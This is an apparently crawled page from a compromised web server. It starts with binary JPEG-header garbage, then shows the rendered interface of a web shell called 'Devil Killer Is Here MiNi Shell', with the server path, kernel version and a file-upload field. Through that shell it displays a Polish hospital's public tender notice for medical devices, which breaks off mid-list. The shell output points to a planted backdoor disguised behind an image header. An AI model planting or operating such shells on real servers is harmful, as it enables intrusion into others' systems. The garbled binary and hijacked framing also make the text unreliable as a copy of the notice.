JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230829/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230829/0037221001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa urządzeń medycznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej Szpital Uniwersytecki nr 2 im. dr Jana Biziela w Bydgoszczy</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Szpital Uniwersytecki nr 2 im. dr Jana Biziela w Bydgoszczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 340517145</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ujejskiego 75</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-168</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523655295</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">523655752</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@biziel.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.biziel.umk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa urządzeń medycznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eb1a8a01-4596-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00372210</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00150302/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.31 Dostawa urządzeń medycznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/biziel_umk/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Wszelka korespondencja związana z prowadzonym postępowaniem winna być opatrzona numerem sprawy: NZZ/65/D/23.<br/>2.W postępowaniu o udzielenie zamówienia publicznego, komunikacja między Zamawiającym, a Wykonawcami w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa przy użyciu platformy zakupowej -<br/>https://platformazakupowa.pl/pn/biziel_umk/proceedings<br/>3. W przypadku wątpliwości dotyczących korzystania z platformy zakupowej, Wykonawca może skontaktować się z Centrum<br/>Wsparcia Klienta Open Nexus Sp. z o.o. – dostawcy rozwiązania teleinformatycznego, pod numerem +48 22 101 02 02, e-mail:<br/>cwk@platformazakupowa.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu o udzielenie zamówienia publicznego, komunikacja między Zamawiającym, a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa przy użyciu platformy zakupowej - https://platformazakupowa.pl/pn/biziel_umk/proceedings<br/>2. Ofertę, dokumenty, oświadczenia składa się w formie dokumentu elektronicznego, podpisane elektronicznym kwalifikowanym<br/>podpisem lub podpisem zaufanym lub podpisem osobistym wyłącznie za pośrednictwem Platformy Zakupowej o której mowa w pkt. 1.<br/>3. Zamawiający dopuszcza komunikację za pośrednictwem poczty elektronicznej na adres: przetargi@biziel.pl jedynie w przypadkach wskazanych w SWZ.<br/>4.Zamawiający po upływie terminu otwarcia ofert dopuszcza komunikację za pośrednictwem poczty elektronicznej na adres<br/>wskazany w pkt. 3. W takim przypadku każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt otrzymania korespondencji.<br/>5. Korzystanie z Platformy Zakupowej: Zamawiający informuje, że posiadanie konta na platformie jest dobrowolne, natomiast<br/>złożenie oferty w postępowaniu może się odbywać bez posiadania konta. Z chwilą aktywacji konta Wykonawca ma dostęp do usług<br/>nieodpłatnych udostępnionych w ramach konta użytkownika, w tym między innymi składania ofert i prowadzenia korespondencji z<br/>Zamawiającym za pośrednictwem Platformy Zakupowej, automatycznego wycofania oferty w przypadku złożenia nowej oferty.<br/>6. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do<br/>zamawiającego”.<br/>7. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego.<br/>8. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>wykonawcy.<br/>9. Wykonawca ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez<br/>zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>10. W sytuacjach awaryjnych, nieprzewidzianych, np. przerwa w funkcjonowaniu lub awaria strony https://platformazakupowa.pl/pn/biziel_umk/proceedings Zamawiający może również komunikować się z Wykonawcami za pomocą<br/>poczty elektronicznej poprzez adres wskazany w pkt. 3.<br/>11. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>12. Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie<br/>Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych<br/>na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>13. Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY<br/>MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/>oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>Uwaga: Dalszy ciąg w części 3.9)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.9.) Sposób dostępu do narzędzi elektronicznego modelowania danych budowlanych: <span class="normal">Zamawiający nie wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne.<br/>14.Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>15. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>- akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>- zapoznał i stosuje się do Instrukcji składania ofert.<br/>16.Wykonawcy mogą zwracać się do Zamawiającego o wyjaśnienie treści SWZ, zgodnie z art. 284 ust. 1 ustawy Prawo zamówień<br/>publicznych, kierując swoje zapytania do Zamawiającego, ze wskazaniem numeru postępowania określonego w SWZ. Zapytania<br/>winny być składane w sposób określony w części 3.6.) pkt.1<br/>17.Wnioski o wyjaśnienie treści specyfikacji( PYTANIA ), zawiadomienia oraz inne informacje do upływu terminu otwarcia ofert w<br/>postępowaniu należy przesyłać wyłącznie za pośrednictwem Platformy Zakupowej w formie umożliwiającej kopiowanie treści pisma i<br/>wklejenie jej do innego dokumentu. Wyjaśnienia dotyczące specyfikacji warunków zamówienia udzielane będą na zasadach i w<br/>terminach określonych w art. 284 ust. 2 ustawy Prawo Zamówień Publicznych poprzez publikację na stronie postępowania pod<br/>warunkiem, że wniosek wpłynie do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert.<br/>Wniosek spóźniony Zamawiający może pozostawić bez rozpoznania.<br/>18. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert / np. złożenie oferty w zakładce – Wyślij wiadomość do zamawiającego.<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Prawo Zamówień Publicznych.<br/>19. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje - załącznik nr 9<br/>20. Wykonawca, za pośrednictwem platformazakupowa.pl może przed upływem terminu do składania ofert zmienić lub wycofać<br/>ofertę. Sposób dokonywania zmiany lub wycofania oferty zamieszczono w instrukcji zamieszczonej na stronie internetowej pod<br/>adresem: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest Szpital Uniwersytecki nr 2 im. dr J. Biziela w Bydgoszczy, ul. Ujejskiego 75, 85-<br/>168 Bydgoszcz, tel: 52/36 55 799, e-mail: kancelaria@biziel.pl, strona internetowa: www.biziel.umk.pl,<br/>- inspektorem ochrony danych osobowych w Szpitalu Uniwersyteckim nr 2 im. dr J. Biziela w Bydgoszczy, ul. Ujejskiego 75 jest Pani<br/>Joanna Maciejewska, e-mail: inspektor.od@biziel.pl, tel: 52 / 36 55 136,<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego.<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu przepisy ustawy Prawo zamówień publicznych<br/>- Pani/Pana dane osobowe będą przechowywane, zgodnie z przepisami ustawy Prawo zamówień publicznych, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy,<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO,<br/>posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>− na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO 2 ,<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO<br/>- nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Udostępnienie zasobów:<br/>1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w<br/>odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi<br/>stosunków prawnych.<br/>2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia<br/>lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>3. Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe<br/>lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w<br/>postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4 ustawy Prawo zamówień publicznych, a także bada, czy nie zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>Zamawiający będzie badał podstawy wykluczenia przewidziane w SWZ – Rozdział XX.<br/>4. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji<br/>finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba<br/>że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>5. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>6. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających<br/>zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZZ/65/D/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 485000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sprzedaż, dostawa i uruchomienie urządzeń medycznych w zakresie niżej wymienionych zadań:<br/>Zadanie 1 – Urządzenia diagnostyczne – Tromboelastometr – 1 szt. <br/>a także przeszkolenie personelu medycznego i przeszkolenie personelu technicznego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 155000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33124100-6 - Urządzenia diagnostyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze i ocenie złożonych ofert, Zamawiający kierować się będzie <br/>Nazwa kryterium<br/>Waga kryterium<br/>Cena. 60%<br/>Okres gwarancji. 20%<br/>Parametry techniczne. 20%<br/>Sposób oceniania ofert:<br/>A) - Kryterium: cena – wskaźnik C – obliczony będzie według wzoru:<br/>C = ( Cn / Cb ) x 60 <br/>Gdzie: <br/>Cn - cena brutto najtańszej oferty.<br/>Cb - cena brutto badanej oferty. <br/>B) - Kryterium: okres gwarancji – wskaźnik G – obliczony będzie według wzoru<br/>G = ( Gp / Gmax ) x 20 <br/>Gdzie: <br/>Gp – ilość punktów otrzymanych przez badaną ofertę. <br/>Gmax – maksymalna liczba punktów do otrzymania w ramach kryterium okres gwarancji.<br/>Gmax = 24 pkt. <br/>W przypadku zaoferowania okresu gwarancji 24 miesiące wykonawca otrzymuje 0 pkt.<br/>Opis oceniany w ramach kryterium - okres gwarancji <br/>Sposób przyznawania punktów:<br/>za każdy dodatkowy miesiąc ponad wartość wymaganą ( 24 miesiące) zamawiający przyzna 1 pkt., tzn.<br/>- za dodatkowy 1 miesiąc – 1 pkt.<br/>- za dodatkowe 2 miesiące – 2 pkt.<br/>- za dodatkowe 3 miesiące – 3 pkt.<br/>- za dodatkowe 4 miesiące – 4 pkt.<br/>- za dodatkowe 5 miesięcy – 5 pkt.<br/>- za dodatkowe 6 miesięcy – 6 pkt.<br/>- za dodatkowe 7 miesięcy – 7 pkt.<br/>- za dodatkowe 8 miesięcy – 8 pkt.<br/>- za dodatkowe 9 miesięcy – 9 pkt.<br/>- za dodatkowe 10 miesięcy – 10 pkt.<br/>- za dodatkowe 11 miesięcy 